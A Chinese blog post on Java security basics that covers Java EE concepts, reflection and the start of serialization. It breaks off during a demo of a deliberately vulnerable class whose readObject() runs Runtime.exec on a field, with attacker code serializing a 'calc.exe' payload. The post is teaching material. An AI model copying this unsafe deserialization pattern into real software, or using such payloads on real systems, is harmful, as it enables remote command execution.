<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="javasec, Apzx7">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>javasec | Apzx7</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 7.3.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Apzx7</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tag" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/category" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Apzx7</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tag" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/category" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/1.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">javasec</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86/">
                                <span class="chip bg-color">漏洞原理</span>
                            </a>
                        
                            <a href="/tags/Java%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">Java安全</span>
                            </a>
                        
                            <a href="/tags/Java/">
                                <span class="chip bg-color">Java</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/Java%E5%AE%89%E5%85%A8/" class="post-category">
                                Java安全
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2025-07-21
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.3k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    22 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="javaee"><a href="#javaee" class="headerlink" title="javaee"></a>javaee</h2><h2 id="什么是-JavaEE"><a href="#什么是-JavaEE" class="headerlink" title="什么是 JavaEE"></a>什么是 JavaEE</h2><h3 id="JavaEE-概念"><a href="#JavaEE-概念" class="headerlink" title="JavaEE 概念"></a>JavaEE 概念</h3><p>Java EE，Java 平台企业版（Java Platform Enterprise Edition），之前称为Java 2 Platform, Enterprise Edition (J2EE)，2018年3月更名为 Jakarta EE(这个名称应该还没有得到群众认可)。狭义的 Java EE 是 Sun 公司为企业级应用推出的标准平台，用来开发B&#x2F;S架构软件，可以说是一个框架，也可以说是一种规范。</p>
<p>广义的 Java EE 包含各种框架，其中最重要的就是 Spring 全家桶。Spring 诞生之初是为了改进 Java EE 开发的体验，后来逐渐成为了 Java Web 开发的实际标准。后面的文章里，会对 Spring 进行进一步的说明。</p>
<h3 id="JavaEE-与-JavaSE-的区别与联系"><a href="#JavaEE-与-JavaSE-的区别与联系" class="headerlink" title="JavaEE 与 JavaSE 的区别与联系"></a>JavaEE 与 <a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=JavaSE&spm=1001.2101.3001.7020">JavaSE</a> 的区别与联系</h3><p>JavaEE 是在 JavaSE 的基础上构建的，是对 JavaSE 的扩展，增加了一些更加便捷的应用框架。</p>
<p>除了 EE 和 SE，还有为移动端而生的 JavaME，但目前应用不算广泛。三者的关系可以用下图概括：</p>
<p><img src="https://i-blog.csdnimg.cn/blog_migrate/1218fe4d5ca24abd52d860eebf8b15c6.png" alt="JavaSE\EE\ME关系"></p>
<h3 id="JavaEE主要技术"><a href="#JavaEE主要技术" class="headerlink" title="JavaEE主要技术"></a>JavaEE主要技术</h3><p>JavaEE 号称有十三种核心技术。它们分别是：<strong>JDBC</strong>、<strong>JNDI</strong>、<strong>EJB</strong>、RMI、<strong>Servlet</strong>、<strong>JSP</strong>、XML、JMS、Java IDL、JTS、JTA、JavaMail和JAF。</p>
<p>简单介绍下需要重点关注的技术。</p>
<h4 id="JDBC"><a href="#JDBC" class="headerlink" title="JDBC"></a>JDBC</h4><p>Java 数据库连接，（Java Database Connectivity，JDBC）是 Java 语言中用来<strong>规范客户端程序如何来访问数据库的应用程序接口</strong>，提供了诸如查询和更新数据库中数据的方法。</p>
<h4 id="JNDI"><a href="#JNDI" class="headerlink" title="JNDI"></a>JNDI</h4><p>Java 命名和目录接口（Java Naming and Directory Interface，JNDI），是 Java 的一个<strong>目录服务应用程序界面</strong>（API），它提供一个目录系统，并将服务名称与对象关联起来，从而使得开发人员在开发过程中可以使用名称来访问对象。</p>
<h4 id="EJB"><a href="#EJB" class="headerlink" title="EJB"></a>EJB</h4><p>企业级 JavaBean（Enterprise JavaBean, EJB）是一个用来构筑企业级应用的服务器端可被管理<strong>组件</strong>。不过这个东西在 Spring 问世后基本凉凉了，知道是什么就行。</p>
<h4 id="Servlet"><a href="#Servlet" class="headerlink" title="Servlet"></a>Servlet</h4><p>Servlet（Server Applet），是用 Java 编写的<strong>服务器端程序</strong>。其主要功能在于交互式地浏览和修改数据，生成动态 Web 内容。</p>
<p><strong>狭义的 Servlet 是指 Java 语言实现的一个接口，广义的 Servlet 是指任何实现了这个 Servlet 接口的类，一般情况下，人们将 Servlet 理解为后者。</strong></p>
<h4 id="JSP"><a href="#JSP" class="headerlink" title="JSP"></a>JSP</h4><p>JSP（全称JavaServer Pages）是由 Sun 公司主导创建的一种<strong>动态网页技术标准</strong>。JSP 部署于网络服务器上，可以响应客户端发送的请求，并根据请求内容动态地生成 HTML、XML 或其他格式文档的 Web 网页，然后返回给请求者。</p>
<h3 id="JavaEE框架"><a href="#JavaEE框架" class="headerlink" title="JavaEE框架"></a>JavaEE框架</h3><p>JavaEE 拥有广泛市场的原因之一就是可以使用多种框架来使开发变得简单。对于框架的选择多种多样，目前比较常见的<strong>框架组合</strong>有 <strong>SSH</strong>和<strong>SSM</strong>。在后面的章节中会作详细介绍。另外Spring本身也提供了多种层次的框架供选择，可以到Spring官网了解详情。</p>
<p>Spring： <a target="_blank" rel="noopener" href="https://spring.io/">https://spring.io/</a></p>
<h4 id="SSH"><a href="#SSH" class="headerlink" title="SSH"></a>SSH</h4><p>Structs + Spring + Hibernate</p>
<h4 id="SSM"><a href="#SSM" class="headerlink" title="SSM"></a>SSM</h4><p>Spring +SpringMVC + MyBatis</p>
<h3 id="JavaEE-学习路径"><a href="#JavaEE-学习路径" class="headerlink" title="JavaEE 学习路径"></a>JavaEE 学习路径</h3><p>一般来讲，初学者应该遵循以下路径</p>
<p><strong>Servlet -&gt; JSP -&gt; Spring -&gt; 组合框架</strong></p>
<p>Servlet 和 JSP 在日后的开发中虽然很少直接应用，但却是各种框架的基础，应该放在开始去了解。</p>
<p>推荐一个学习 Java 的良心网站，里面有 Java 全栈知识，在每个阶段都设置了练习内容，——</p>
<p><a target="_blank" rel="noopener" href="http://how2j.cn/?p=50613">「How2J 的 Java 教程」</a></p>
<h2 id="java反射基础"><a href="#java反射基础" class="headerlink" title="java反射基础"></a>java反射基础</h2><h3 id="一、反射基础代码感知"><a href="#一、反射基础代码感知" class="headerlink" title="一、反射基础代码感知"></a>一、反射基础代码感知</h3><h4 id="1-反射是什么？"><a href="#1-反射是什么？" class="headerlink" title="1.反射是什么？"></a><strong>1.反射是什么？</strong></h4><p>反射就像是Java给你的“后悔药”——允许你在代码跑起来之后，再动态地去：</p>
<ol>
<li><strong>看</strong>一个类的内部结构（有啥方法、字段、注解）</li>
<li><strong>凭空造新的obj</strong>（new对象）</li>
<li><strong>远程操控</strong>（调方法、改字段值）</li>
<li><strong>无视隐私</strong>（访问<code>private</code>成员！）</li>
</ol>
<blockquote>
<p><strong>为啥叫“反射”？</strong><br>可以把一个类当成镜子，反射就是让你在运行时“照镜子”——看清自己（类）长啥样，还能动手动脚（改它）。</p>
</blockquote>
<h4 id="2-反射能做什么？"><a href="#2-反射能做什么？" class="headerlink" title="2. 反射能做什么？"></a>2. <strong>反射能做什么？</strong></h4><p>通过反射，<strong>运行时</strong>动态操作类信息，无需在编译时确定具体类。以下代码演示核心功能：</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;&#x2F; 1. 动态加载类（类名可来自配置文件&#x2F;网络）
Class&lt;?&gt; clazz &#x3D; Class.forName(&quot;java.lang.String&quot;);

&#x2F;&#x2F; 2. 创建对象（无需new关键字）
Object str &#x3D; clazz.getDeclaredConstructor().newInstance();

&#x2F;&#x2F; 3. 调用方法（方法名可动态传入）
Method method &#x3D; clazz.getMethod(&quot;substring&quot;, int.class);
String result &#x3D; (String) method.invoke(str, 2); &#x2F;&#x2F; 调用str.substring(2)

&#x2F;&#x2F; 4. 访问私有字段（突破封装性）
Field field &#x3D; clazz.getDeclaredField(&quot;value&quot;); &#x2F;&#x2F; String内部存储字符的数组
field.setAccessible(true); &#x2F;&#x2F; 暴力反射！
byte[] value &#x3D; (byte[]) field.get(str);
System.out.println(Arrays.toString(value)); &#x2F;&#x2F; 输出字符数组<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>以<strong>Spring IOC</strong>为例，它大概这么玩反射：</p>
<pre class="line-numbers language-none"><code class="language-none">
public class BeanFactory &#123;
    private Map&lt;String, Object&gt; beanMap &#x3D; new HashMap&lt;&gt;();
    
    public void registerBean(String beanName, String className) &#123;
        &#x2F;&#x2F; 1. 反射加载类
        Class&lt;?&gt; clazz &#x3D; Class.forName(className);
        &#x2F;&#x2F; 2. 反射创建对象（通常调无参构造）
        Object bean &#x3D; clazz.getDeclaredConstructor().newInstance();
        &#x2F;&#x2F; 3. 塞进容器（下次getBean直接拿）
        beanMap.put(beanName, bean);
    &#125;
    
    public Object getBean(String beanName) &#123;
        return beanMap.get(beanName);
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<blockquote>
<p>实际Spring还做了<strong>依赖注入</strong>（用反射<code>set</code>字段）、<strong>AOP代理</strong>（反射调方法）—— 所以说没反射就没Spring！</p>
</blockquote>
<blockquote>
<p>另外进阶的（待）：</p>
<ul>
<li><strong>动态代理</strong>：JDK的<code>Proxy.newProxyInstance()</code>靠反射生成代理类，实现AOP切面。</li>
</ul>
</blockquote>
<ul>
<li><strong>注解扫描</strong>：JUnit用反射找<code>@Test</code>方法；Spring扫描<code>@Component</code>。</li>
<li><strong>越过泛型擦除</strong>：反射能拿到<code>List&lt;String&gt;</code>的实际泛型类型（虽然99%场景用不到）。</li>
</ul>
<p><strong>关键点</strong>：</p>
<ul>
<li><code>Class.forName()</code>：通过字符串加载类（<strong>解耦</strong>的关键）</li>
<li><code>getMethod()</code> + <code>invoke()</code>：动态调用方法（框架核心原理）</li>
<li><code>setAccessible(true)</code>：访问私有成员（<strong>慎用</strong>，破坏封装性）</li>
</ul>
<hr>
<h3 id="二、反射的核心原理与类库"><a href="#二、反射的核心原理与类库" class="headerlink" title="二、反射的核心原理与类库"></a>二、反射的核心原理与类库</h3><h4 id="1-反射的基石：Class对象—–-反射的钥匙"><a href="#1-反射的基石：Class对象—–-反射的钥匙" class="headerlink" title="1. 反射的基石：Class对象—– 反射的钥匙"></a>1. <strong>反射的基石：<code>Class</code>对象</strong>—– <strong>反射的钥匙</strong></h4><ul>
<li><p><strong>每个类在JVM中只有一个<code>Class</code>对象</strong>，存储类元信息（方法、字段等）。</p>
</li>
<li><p>获取<code>Class</code>对象的三种方式：</p>
  <pre class="line-numbers language-none"><code class="language-none">Class&lt;?&gt; c1 &#x3D; String.class;          &#x2F;&#x2F; 类字面量
Class&lt;?&gt; c2 &#x3D; &quot;abc&quot;.getClass();      &#x2F;&#x2F; 对象实例
Class&lt;?&gt; c3 &#x3D; Class.forName(&quot;java.lang.String&quot;); &#x2F;&#x2F; 最常用（动态加载）<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>  <strong>为什么用<code>Class.forName</code>？</strong><br>  支持从配置文件&#x2F;数据库读取类名，实现<strong>动态扩展</strong>（如Spring的Bean加载）。</p>
</li>
</ul>
<h4 id="2-反射操作的三类API"><a href="#2-反射操作的三类API" class="headerlink" title="2. 反射操作的三类API"></a>2. <strong>反射操作的三类API</strong></h4><table>
<thead>
<tr>
<th><strong>操作类型</strong></th>
<th><strong>核心类</strong></th>
<th><strong>常用方法</strong></th>
<th><strong>用途</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>创建对象</strong></td>
<td><code>Constructor</code></td>
<td><code>getDeclaredConstructor()</code> + <code>newInstance()</code></td>
<td>替代<code>new</code>关键字</td>
</tr>
<tr>
<td><strong>调用方法</strong></td>
<td><code>Method</code></td>
<td><code>getMethod()</code> + <code>invoke()</code></td>
<td>动态执行方法（如Spring MVC控制器）</td>
</tr>
<tr>
<td><strong>访问字段</strong></td>
<td><code>Field</code></td>
<td><code>getDeclaredField()</code> + <code>get()/set()</code></td>
<td>读写字段值（包括私有字段）</td>
</tr>
</tbody></table>
<h4 id="不用new也能创建对象"><a href="#不用new也能创建对象" class="headerlink" title="** 不用new也能创建对象**"></a>** 不用new也能创建对象**</h4><p>拿到<code>Class</code>后，就能创建对象了！尤其适合<strong>不知道具体类</strong>的场景（比如Spring创建Bean）：</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;&#x2F; 1：调无参构造（最常用）
Class&lt;?&gt; clazz &#x3D; Class.forName(&quot;com.example.User&quot;);
Object user &#x3D; clazz.getDeclaredConstructor().newInstance(); &#x2F;&#x2F; 相当于 new User()

&#x2F;&#x2F; 2：调有参构造（带参数的那种）
Constructor&lt;?&gt; constructor &#x3D; clazz.getConstructor(String.class, int.class); &#x2F;&#x2F; 参数类型列表
Object user2 &#x3D; constructor.newInstance(&quot;张三&quot;, 25); &#x2F;&#x2F; 传入实参<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<blockquote>
<p> <strong>坑</strong>：<code>clazz.newInstance()</code>已过时！用<code>getDeclaredConstructor().newInstance()</code>代替。</p>
</blockquote>
<hr>
<h4 id="方法"><a href="#方法" class="headerlink" title="** 方法**"></a>** 方法**</h4><p>动态调方法才是反射的好玩操作！比如根据用户输入调用不同API：</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;&#x2F; 步骤1：拿到Method对象（方法名+参数类型）
Method method &#x3D; clazz.getMethod(&quot;setName&quot;, String.class); &#x2F;&#x2F; 方法名&quot;setName&quot;，参数String

&#x2F;&#x2F; 步骤2：对着对象“按按钮”（invoke）
method.invoke(user, &quot;张三&quot;); &#x2F;&#x2F; 相当于 user.setName(&quot;张三&quot;)

&#x2F;&#x2F; 甚至...调用私有方法！（危险动作）
Method secretMethod &#x3D; clazz.getDeclaredMethod(&quot;privateMethod&quot;);
secretMethod.setAccessible(true); &#x2F;&#x2F; 暴力突破private限制！
secretMethod.invoke(user);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<blockquote>
<p> <strong>黑科技</strong>：<code>setAccessible(true)</code>是反射的“破墙锤”——能访问<code>private</code>&#x2F;<code>protected</code>成员（框架里常用，自己代码慎用！）。</p>
</blockquote>
<hr>
<h4 id="改字段——改对象内存"><a href="#改字段——改对象内存" class="headerlink" title="** 改字段——改对象内存**"></a>** 改字段——改对象内存**</h4><p>直接修改对象属性，连setter都不用</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;&#x2F; 偷看字段值
Field field &#x3D; clazz.getDeclaredField(&quot;age&quot;);
field.setAccessible(true); &#x2F;&#x2F; 无视private
int age &#x3D; (int) field.get(user); &#x2F;&#x2F; 拿到user.age的值

&#x2F;&#x2F; 偷偷改掉！
field.set(user, 30); &#x2F;&#x2F; 神不知鬼不觉把age改成30<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<blockquote>
<p> <strong>实验</strong>：试试用反射改<code>String</code>的内容？—— JVM对<code>String</code>做了优化，别白费劲啦。</p>
</blockquote>
<blockquote>
<p> <strong>对比：</strong></p>
<ul>
<li><code>getDeclaredXxx()</code>：获取<strong>所有</strong>成员（包括私有）</li>
<li><code>getXxx()</code>：仅获取<strong>public</strong>成员</li>
</ul>
</blockquote>
<h4 id="3-反射的底层实现"><a href="#3-反射的底层实现" class="headerlink" title="3. 反射的底层实现"></a>3. <strong>反射的底层实现</strong></h4><ul>
<li><strong>类加载机制</strong>：<br>  JVM加载<code>.class</code>文件 → 生成<code>Class</code>对象 → 解析类结构（方法表、字段表等）。</li>
<li><strong>反射调用性能较低</strong>：<br>  因需<strong>动态解析类型</strong> + <strong>安全检查</strong>（如<code>setAccessible</code>跳过检查可提升性能）。</li>
</ul>
<hr>
<h3 id="三、反射的应用场景与注意事项"><a href="#三、反射的应用场景与注意事项" class="headerlink" title="三、反射的应用场景与注意事项"></a>三、反射的应用场景与注意事项</h3><h4 id="1-典型应用场景"><a href="#1-典型应用场景" class="headerlink" title="1. 典型应用场景"></a>1. <strong>典型应用场景</strong></h4><table>
<thead>
<tr>
<th><strong>场景</strong></th>
<th><strong>代表框架</strong></th>
<th><strong>反射的作用</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>动态代理</strong></td>
<td>Spring AOP</td>
<td>生成代理类，拦截方法调用</td>
</tr>
<tr>
<td><strong>依赖注入</strong></td>
<td>Spring IOC</td>
<td>根据配置创建并注入Bean对象</td>
</tr>
<tr>
<td><strong>注解解析</strong></td>
<td>JUnit</td>
<td>扫描<code>@Test</code>注解的方法并执行测试</td>
</tr>
<tr>
<td><strong>序列化&#x2F;反序列化</strong></td>
<td>Jackson&#x2F;Gson</td>
<td>将JSON字段映射到对象的私有属性</td>
</tr>
</tbody></table>
<h4 id="2-反射的“安全墙”"><a href="#2-反射的“安全墙”" class="headerlink" title="2. 反射的“安全墙”"></a>2. <strong>反射的“安全墙”</strong></h4><ul>
<li><strong>权限控制</strong>：<br>  默认无法访问私有成员，需显式调用<code>setAccessible(true)</code>（可能触发安全管理器拦截）。</li>
<li><strong>替代方案</strong>：<br>  优先使用接口、设计模式（如工厂模式），避免过度依赖反射。</li>
</ul>
<h4 id="3-性能优化建议"><a href="#3-性能优化建议" class="headerlink" title="3. 性能优化建议"></a>3. <strong>性能优化建议</strong></h4><ul>
<li><strong>缓存<code>Class</code>对象</strong>：避免重复调用<code>Class.forName()</code>。</li>
<li><strong>减少<code>setAccessible(true)</code>调用</strong>：每次调用都有安全检查开销。</li>
<li><strong>优先用接口调用</strong>：如<code>obj.method()</code>比<code>method.invoke(obj)</code>快10倍以上。</li>
</ul>
<hr>
<h3 id="四、总结："><a href="#四、总结：" class="headerlink" title="四、总结："></a>四、总结：</h3><pre class="line-numbers language-none"><code class="language-none">graph TD
    A[反射核心：Class对象] --&gt; B[创建对象]
    A --&gt; C[调用方法]
    A --&gt; D[访问字段]
    B --&gt; E[Constructor.newInstance()]
    C --&gt; F[Method.invoke()]
    D --&gt; G[Field.get()&#x2F;set()]
    E --&gt; H[动态代理&#x2F;IOC]
    F --&gt; I[框架方法拦截]
    G --&gt; J[序列化&#x2F;配置注入]
    H --&gt; K[Spring]
    I --&gt; K
    J --&gt; K<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>反射的本质</strong>：<strong>运行时操作类元信息的能力</strong>，是框架灵活性的根基，但需权衡<strong>灵活性</strong>、<strong>安全性</strong>与<strong>性能</strong>。</p>
<h2 id="java序列化基础"><a href="#java序列化基础" class="headerlink" title="java序列化基础"></a>java序列化基础</h2><h3 id="一、先看一个漏洞触发案例"><a href="#一、先看一个漏洞触发案例" class="headerlink" title="一、先看一个漏洞触发案例"></a><strong>一、先看一个漏洞触发案例</strong></h3><p>完整：</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;&#x2F; 漏洞类：重写了readObject()
public class VulnerableObject implements Serializable &#123;
    private String command;
    &#x2F;&#x2F; 构造方法略...
    
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException &#123;
        in.defaultReadObject(); &#x2F;&#x2F; 默认反序列化
        Runtime.getRuntime().exec(this.command); &#x2F;&#x2F; 危险操作！
    &#125;
&#125;

&#x2F;&#x2F; 攻击者构造恶意数据
public class Attack &#123;
    public static void main(String[] args) throws Exception &#123;
        &#x2F;&#x2F; 1. 创建恶意对象（命令注入）
        VulnerableObject payload &#x3D; new VulnerableObject(&quot;calc.exe&quot;);
        
        &#x2F;&#x2F; 2. 序列化对象 -&gt; 字节流
        ByteArrayOutputStream bos &#x3D; new ByteArrayOutputStream();
        ObjectOutputStream oos &#x3D; new ObjectOutputStream(bos);
        oos.writeObject(payload);
        byte[] maliciousData &#x3D; bos.toByteArray();
        
